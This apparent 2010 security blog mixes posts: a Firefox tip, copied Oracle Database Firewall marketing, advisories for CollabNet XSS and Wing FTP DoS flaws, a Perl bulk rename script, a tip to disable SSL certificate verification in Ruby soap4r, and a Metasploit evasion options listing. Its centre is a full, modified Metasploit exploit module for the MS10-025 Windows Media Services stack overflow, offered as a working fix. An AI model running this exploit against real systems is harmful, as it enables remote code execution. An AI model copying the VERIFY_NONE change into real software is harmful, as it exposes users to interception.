Sunday, December 19, 2010

Open popups in new windows in firefox

Have you ever had trouble with popups that open in a new window when you want them in a new tab? The fix is simple: in Firefox, type about:config and change the value of the
browser.link.open_newwindow.restriction parameter to 0. That will solve the problem.

Friday, December 10, 2010

MSN Still Missing Twitter

 

I installed the latest Windows Live Messenger 2011, a great improvement over its ancestors. It is faster and has a pretty cool theme-based GUI. The biggest makeover/USP of this new toy is its seamless integration with various social networks like Facebook, LinkedIn etc.

Although some articles claim that it also integrates Twitter, that turns out to be false; that's the only gem missing from MSN. I am looking forward to Microsoft providing Twitter integration too, so I won't need to use my browser or a third-party plugin to stay on Twitter.


The other service I wish to access through MSN is Orkut (a social networking site widely used in India), but Twitter is number one on my list, as I am used to Echofon (a Firefox plugin), which keeps me connected to Twitter all the time without opening an extra web page and shows new tweets instantly.

MSN can keep me updated on my Facebook updates and Hotmail; with Twitter, my online social requirements would be fulfilled. I don't want to use any third-party tool/plugin for this purpose, for performance and security reasons. I hope that Microsoft soon integrates Twitter and Orkut; let's cross our fingers.

Oracle Database Firewall

 


http://www.oracle.com/us/products/database/database-firewall-160528.html

Cost Effective Protection for Oracle and non-Oracle Databases
Oracle Database Firewall, part of Oracle's comprehensive portfolio of database security solutions, is the first line of defense for both Oracle and non-Oracle databases. It monitors database activity on the network to help prevent unauthorized access, SQL injections, privilege or role escalation, and other external and internal attacks - all in real time. Based on innovative SQL grammar technology that can reduce millions of SQL statements into a small number of SQL characteristics, Oracle Database Firewall offers unmatched accuracy, scalability, and performance. Enforcement of positive (white lists) and negative (black lists) security models provides protection from threats without time-consuming and costly false positives. Oracle Database Firewall also enables organizations to address SOX, PCI, HIPAA/HITECH, and other regulatory requirements without changes to existing applications or databases, and demonstrate compliance with over a hundred built-in customizable reports.

Oracle Database Firewall Key Features


Database Firewall for Security and Compliance

White list, black list, exception list policies

3-click security policies

Safe, scalable deployment models

Flexible reporting and alerting

Database Firewall for Security and Compliance

Traditional network firewalls are an established technology and play an important role in protecting data centers from unauthorized access from the outside. Data center attacks, however, have grown increasingly sophisticated, leveraging porous perimeters on the inside to launch attacks on the database itself.

Examining SQL traffic and enforcing security policies on the network has emerged as an important addition to the defense-in-depth security architecture. This is especially true in heterogeneous database environments where security controls cannot be enforced in the database itself. Oracle Database Firewall creates a defensive perimeter around databases, monitoring and enforcing normal application behavior, helping to prevent SQL injection attacks and attempts to access sensitive application data using unauthorized SQL commands. Oracle Database Firewall:

· Monitors and blocks SQL traffic on the network with white list, black list and exception list policies

· Protects against application bypass, SQL injection and similar threats

· Reports on database activity for SOX, PCI and other regulations, choosing from over 100 out-of-the-box reports

· Protects Oracle, SQL Server and Sybase databases

White list, black list, exception list policies

Oracle Database Firewall examines the grammar of the SQL statements being sent to the database, analyzes their meaning, and determines the appropriate security policy to apply. This highly accurate approach provides a significantly higher degree of protection than first-generation database monitoring technologies that relied on recognizing the "signature" of known security threats. By enforcing normal application behavior, Oracle Database Firewall helps organizations avoid the costly and disruptive false positives and false negatives common with other approaches. Oracle Database Firewall recognizes SQL injection attacks on compromised applications and blocks them before they reach the database.

3-click security policies

Oracle Database Firewall supports white list, black list, and exception list policies. White list policies are simply the set of approved SQL commands that the firewall expects to see. These can be learned over time or imported from another Oracle Database Firewall. Black list policies are SQL commands that are not permitted to be sent to the database. Exception list policies provide additional deployment flexibility that can be used for one-off reporting or other special requirements. Policies can be enforced based on attributes including SQL category, time of day, applications, user, and IP addresses.


Oracle Database Firewall can log the SQL command in question, block the SQL command, or substitute the incoming bad SQL request with an alternative SQL statement that, for example, simply returns no data, or returns a predetermined error message such as "no records found". This flexibility, combined with advanced SQL grammar analysis, enables organizations to spend more time doing what needs to be done and less time handling false alarms.
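
The white list, black list and exception list flow and the pass, block or substitute outcomes described above can be sketched as follows. This is an added illustration, not Oracle's implementation: a regex normaliser stands in for the grammar analysis, and the policy precedence, class names, method names and sample statements are assumptions.

```ruby
# Added illustration, not Oracle's implementation: a regex normaliser stands in
# for grammar analysis, and the policy order below is an assumption.
module SqlPolicy
  NO_DATA = 'SELECT 1 FROM dual WHERE 1 = 0'  # substitute that returns no rows

  # Reduce a statement to its shape so that many statements share one entry.
  def self.fingerprint(sql)
    s = sql.gsub(/'(?:[^']|'')*'/, '?')    # string literals ('' is an escaped quote)
    s = s.gsub(/\b\d+(?:\.\d+)?\b/, '?')   # numeric literals
    s.gsub(/\s+/, ' ').strip.downcase
  end

  class Firewall
    def initialize
      @white = {}        # learned fingerprints of normal application SQL
      @black = []        # regexes over fingerprints that are never allowed
      @exceptions = []   # callables (fingerprint, ctx) -> true to let through
    end

    def learn(sql)
      @white[SqlPolicy.fingerprint(sql)] = true
    end

    def deny(regex)
      @black << regex
    end

    def allow_when(&rule)
      @exceptions << rule
    end

    # Returns [action, statement forwarded to the database or nil].
    def decide(sql, ctx = {})
      fp = SqlPolicy.fingerprint(sql)
      return [:exception, sql] if @exceptions.any? { |r| r.call(fp, ctx) }
      return [:block, nil]     if @black.any? { |re| fp =~ re }
      return [:pass, sql]      if @white.key?(fp)
      [:substitute, NO_DATA]   # unseen shape: answer with "no rows" instead
    end
  end
end

# Constructed sample policy: one learned statement, one deny rule, one exception.
def sample_firewall
  fw = SqlPolicy::Firewall.new
  fw.learn("SELECT name FROM users WHERE id = 42")
  fw.deny(/\bdrop\s+table\b/)
  fw.allow_when { |fp, ctx| ctx[:user] == 'report_job' && fp.start_with?('select count(') }
  fw
end
```

A statement that differs from a learned one only in its literals maps to the same fingerprint and passes, while one with an extra clause has a new shape and is answered with the no-data substitute.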

Safe, Scalable Deployment Models

Oracle Database Firewall works on the network, transparent to database servers and applications, and can be quickly deployed. Customers can choose from several deployment models to meet their business requirements:

· Inline blocking and monitoring mode

· Inline monitoring-only mode

· Out-of-band monitoring mode

Oracle Database Firewall provides a centralized management console for monitoring multiple databases simultaneously and supports parallel devices for high availability deployments. Optional host-based agents can provide low-impact local monitoring capabilities.


 

Flexible reporting and alerting

Oracle Database Firewall includes over 125 prebuilt reports that can be easily customized for regulations such as PCI, HIPAA and SOX. Real-time alerts can also be set up for fast response to any policy exception. For privacy and compliance requirements, personally identifiable information contained in logged SQL can be masked.


Thursday, September 16, 2010

CollabNet Subversion Edge Log Parser XSS/Code Injection Vulnerability

Discovery Date: Sep 10, 2010
Risk: Important
Description:

There is a cross-site scripting (XSS) vulnerability in CollabNet Subversion Edge 1.2 and prior versions. It can be exploited by sending a crafted request to the CollabNet Subversion server. When an administrator then views the log file, the XSS code is executed.

More information on this can be found on the following page:
https://ctf.open.collab.net/sf/sfmain/do/go/artf5016?returnUrlKey=1284577592506

Patch Information:

More information on the patch can be found in the following page:
https://ctf.open.collab.net/sf/wiki/do/viewPage/projects.svnedge/wiki/Release_1.2.1

Discovered by: Sumit Kumar Soni, Trend Micro
Email: ssummit@gmail.com
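
The flaw class described above (request data written to a log and later shown in an administrator's browser) comes down to whether the log viewer escapes what it renders. The following is an added example, not CollabNet's code; the log layout, function names and sample line are constructed.

```ruby
require 'cgi'

# Added illustration; not CollabNet's code. The access-log layout is an assumption.
LOG_LINE = /\A(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)" (\d{3}) (\S+)\z/

# Vulnerable pattern: text taken from the log is pasted into the page as-is,
# so markup inside a logged request becomes part of the admin page.
def render_row_unsafe(line)
  "<tr><td>#{line.chomp}</td></tr>"
end

# Hardened: split into fields, then HTML-escape every value taken from the log.
def render_row(line)
  m = LOG_LINE.match(line.chomp)
  cells = m ? m.captures : [line.chomp]   # unparseable lines are shown whole, still escaped
  '<tr>' + cells.map { |c| "<td>#{CGI.escapeHTML(c)}</td>" }.join + '</tr>'
end

# Constructed log line whose request path carries markup.
SAMPLE = '192.0.2.10 - - [10/Sep/2010:12:00:00 +0000] ' \
         '"GET /svn/<script>alert(1)</script> HTTP/1.1" 404 210'
```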

Sunday, June 20, 2010

Wing FTP Server PORT Command DoS Vulnerability

Discovery Date: Nov 14, 2009
Risk: Important
Affected Software:

* Wing FTP Server 3.1.2

Description:

There is a Denial of Service (DoS) vulnerability in Wing FTP Server 3.1.2. It can be exploited by using an invalid parameter for the PORT command. When exploited successfully, the vulnerability could cause an FTP server running the software to crash.

Wing FTP Server 3.1.2 on a Windows environment is affected. Other versions may also be affected.

Patch Information:

More information on the patch can be found in the following page:

* Wing FTP Server History

Discovered by: Sumit Kumar Soni , Trend Micro
Email: ssummit @ gmail.com
Read more about this threat incident in the Malware Blog entry "Trend Micro Discovers Wing FTP Server PORT Command DoS Bug."

Thursday, April 29, 2010

Solution to avoid SSL Cert Verification in Ruby Soap4r

Just add

@verify_mode = SSL::VERIFY_NONE

in C:\ruby\lib\ruby\gems\1.8\gems\httpclient-2.1.5.2\lib\httpclient\ssl_config.rb


if you want to avoid the following error.


at depth 0 - 18: self signed certificate
c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `connect': certificate verify failed (OpenSSL::SSL::SSLError)
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:247:in `ssl_connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:639:in `connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/timeout.rb:128:in `timeout'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:631:in `connect'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:522:in `query'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient/session.rb:147:in `query'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:953:in `do_get_block'
from c:/ruby/lib/ruby/gems/1.8/gems/httpclient-2.1.5.2/lib/httpclient.rb:765:in `do_request'
... 7 levels...
from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/proxy.rb:143:in `call'
from c:/ruby/lib/ruby/gems/1.8/gems/soap4r-1.5.8/lib/soap/rpc/driver.rb:181:in `call'
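
Error 18 in the trace above means the server certificate is self-signed and not in the client's trust store, and patching ssl_config.rb turns the check off for every program that uses that copy of the gem. As an added example (not from the original post; it uses Ruby's OpenSSL bindings directly, and the host names and helper names are constructed), trusting that one certificate keeps verification on:

```ruby
require 'openssl'

# Build a throwaway self-signed certificate, like the one the SOAP server presents.
def self_signed_cert(cn)
  key  = OpenSSL::PKey::RSA.new(2048)
  name = OpenSSL::X509::Name.parse("/CN=#{cn}")
  cert = OpenSSL::X509::Certificate.new
  cert.version    = 2                      # X.509 v3
  cert.serial     = 1
  cert.subject    = name
  cert.issuer     = name                   # issuer == subject: self-signed
  cert.public_key = key.public_key
  cert.not_before = Time.now - 60
  cert.not_after  = Time.now + 3600
  cert.sign(key, OpenSSL::Digest.new('SHA256'))
  cert
end

# Verify `cert` against a store that holds only the `trusted` certificates.
# Returns [ok, openssl_error_code]; code 18 is the error shown in the trace.
def verify_with(cert, trusted)
  store = OpenSSL::X509::Store.new
  trusted.each { |c| store.add_cert(c) }
  ok = store.verify(cert)
  [ok, store.error]
end

def demo
  server = self_signed_cert('soap.example.test')   # constructed name
  other  = self_signed_cert('other.example.test')  # constructed name
  {
    empty_store:  verify_with(server, []),         # fails with error 18
    pinned:       verify_with(server, [server]),   # passes, verification stays on
    wrong_pinned: verify_with(server, [other])     # still fails
  }
end
```

With httpclient, the same effect is obtained by pointing the client's ssl_config at a file containing the server's certificate (set_trust_ca) instead of changing verify_mode.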

Sunday, April 25, 2010

Rename Multiple Files

Usage: rename perlexpr direpath


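#!/usr/bin/perl
use strict;
use warnings;

# Rename every file in a directory by applying a Perl expression to its name.
# The expression is run with eval, i.e. as Perl code operating on $_.
if (@ARGV != 2) {
    print "Usage: rename perlexpr direpath\n";
    print "ex. rename s/exe/html/ c:/test\n";
    exit(0);
}
my $regexp = shift;
my $dir    = shift;
opendir(my $dh, $dir) or die "Cannot open $dir: $!\n";
my @files = readdir($dh);
closedir($dh);
foreach my $file (@files) {
    next if $file eq '.' or $file eq '..';   # skip the directory entries themselves
    print "file-->$file\n";
    local $_ = $file;
    eval $regexp;                            # the expression edits $_ in place
    die $@ if $@;
    my $path = "$dir/$file";
    print "$path\n";
    # Rename only when the expression actually changed the name.
    unless ($file eq $_) {
        rename($path, "$dir/$_") or warn "Cannot rename $path: $!\n";
    }
}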

Friday, April 23, 2010

Whats wrong with MSF ms10_025_wmss_connect_funnel Sploit

It looks like the Metasploit team added this exploit to the framework in a hurry. They are sending the Current info and Transport info messages in a single packet, which will never exploit the vulnerability (correct me).

Here is the modified code that should work.

##
# $Id: ms10_025_wmss_connect_funnel.rb 9101 2010-04-17 11:22:37Z swtornio $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh

def initialize(info = {})
super(update_info(info,
'Name' => 'Windows Media Services ConnectFunnel Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the Windows Media
Unicast Service version 4.1.0.3930 (NUMS.exe). By sending a specially
crafted FunnelConnect request, an attacker can execute arbitrary code
under the "NetShowServices" user account. Windows Media Services 4.1 ships
with Windows 2000 Server, but is not installed by default.

NOTE: This service does NOT restart automatically. Successful, as well as
unsuccessful exploitation attempts will kill the service which prevents
additional attempts.
},
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision: 9101 $',
'References' =>
[
[ 'CVE', '2010-0478' ],
[ 'OSVDB', '63726' ],
[ 'MSB', 'MS10-025' ],
[ 'URL', 'https://www.lexsi.com/abonnes/labs/adviso-cve-2010-0478.txt' ]
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 600,
'BadChars' => "\x00\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows 2000 Pro SP4 English',
{
# SEH handler offset is 840
# Stack return is at 652
'Offset' => 840,
'Ret' => 0x75022ac4 # p/p/r in ws2help.dll
}
],
],
'Privileged' => false,
'DisclosureDate' => 'Apr 13 2010',
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(1755)
], self.class)
end

def exploit
@pkts = 0
cmd_buf = ''

# LinkViewerToMacConnect
subscriber = "NSPlayer/4.1.0.3928; {68c0a090-8797-11d2-a2b3-00a0c9b60551}"
#subscriber = "NSPlayer/7.0.0.1956; {}; Host: The.Host.Net"
#subscriber = "Spooooon!"
subscriber << "\x00"
subscriber = Rex::Text.to_unicode(subscriber)
cmd_buf << make_command(0x30001, subscriber)

# LinkViewerToMacConnectFunnel
#name = Rex::Text.pattern_create(512)
name = ''
name << "\\\\"
name << rand_text((target['Offset'] + 4 + 5) / 2)
name << "\\"
name << "\x00"

# Convert it to Unicode..
name = Rex::Text.to_unicode(name)

# Insert the return address..
name[4,payload.encoded.length] = payload.encoded

# Build the SEH frame that leads to the payload...
seh = generate_seh_record(target.ret)
asm = "add edi, 0x04\njmp edi"
seh << Metasm::Shellcode.assemble(Metasm::Ia32.new, asm).encode_string
name[target['Offset'],seh.length] = seh

##sumit start
pkt = make_tcpmsghdr(cmd_buf)
connect
sock.put(pkt)
##sumit done
cmd_buf = ''

# Add it to the command buffer..
cmd_buf << make_command(0x30002, name)

# Build the TcpMessageHeader ..
pkt = make_tcpmsghdr(cmd_buf)

print_status("Sending crafy commands (#{pkt.length} bytes) ...")
# Handle the transacation..
#connect
sock.put(pkt)

handler
disconnect
end


#
# Create a TcpMessageHeader from the supplied data
#
def make_tcpmsghdr(data)
len = data.length
# The server doesn't like packets that are bigger...
raise RuntimeError, 'Length too big' if (len > 0x1000)
len /= 8

# Pack the pieces in ...
pkt = [
1,0,0,0, # rep, ver, verMinor, pad
0xb00bface, # session id (nice)
data.length + 16, # msg len
0x20534d4d, # seal ("MMS ")
len + 2, # chunkCount
@pkts, 0, # seq, MBZ
rand(0xffffffff),rand(0xffffffff) # timeSent -- w/e
].pack('CCCCVVVVvvVV')

# Add the data
pkt << data

# Pad it to 8 bytes...
left = data.length % 8
pkt << ("\x00" * (8 - left)) if (left > 0)

pkt
end


#
# Create a command packet
#
def make_command(msg_id, extra)
# Two opcodes, get handled differently..
case msg_id
when 0x30001
data = [0xf0f0f0f0,0x0004000b,0x0003001c].pack('VVV')

when 0x30002
data = [0xf0f0f0f1,0xffffffff,0,0x989680,0x00000002].pack('VVVVV')

end

# Put some data on...
data << extra

# Pad it to 8 bytes...
left = data.length % 8
data << ("\x00" * (8 - left)) if (left > 0)

# Combine the pieces..
pkt = [
(data.length / 8) + 1, # chunkLen
msg_id # msg ID
].pack('VV')
pkt << data

pkt
end

end

Saturday, March 27, 2010

What is not Correct with MSF

It looks like their spell check missed this typo (check the TCP::max_send_size description).

msf exploit(ms08_067_netapi) > show evasion

Module evasion options:

Name : DCERPC::fake_bind_multi
Current Setting: true
Description : Use multi-context bind calls

Name : DCERPC::fake_bind_multi_append
Current Setting: 0
Description : Set the number of UUIDs to append the target

Name : DCERPC::fake_bind_multi_prepend
Current Setting: 0
Description : Set the number of UUIDs to prepend before the target

Name : DCERPC::max_frag_size
Current Setting: 4096
Description : Set the DCERPC packet fragmentation size

Name : DCERPC::smb_pipeio
Current Setting: rw
Description : Use a different delivery method for accessing named pipes
(accepted: rw, trans)

Name : SMB::obscure_trans_pipe_level
Current Setting: 0
Description : Obscure PIPE string in TransNamedPipe (level 0-3)

Name : SMB::pad_data_level
Current Setting: 0
Description : Place extra padding between headers and data (level 0-3)

Name : SMB::pad_file_level
Current Setting: 0
Description : Obscure path names used in open/create (level 0-3)

Name : SMB::pipe_evasion
Current Setting: False
Description : Enable segmented read/writes for SMB Pipes

Name : SMB::pipe_read_max_size
Current Setting: 1024
Description : Maximum buffer size for pipe reads

Name : SMB::pipe_read_min_size
Current Setting: 1
Description : Minimum buffer size for pipe reads

Name : SMB::pipe_write_max_size
Current Setting: 1024
Description : Maximum buffer size for pipe writes

Name : SMB::pipe_write_min_size
Current Setting: 1
Description : Minimum buffer size for pipe writes

Name : TCP::max_send_size
Current Setting: 0
Description : Maxiumum tcp segment size. (0 = disable)

Name : TCP::send_delay
Current Setting: 0
Description : Delays inserted before every send. (0 = disable)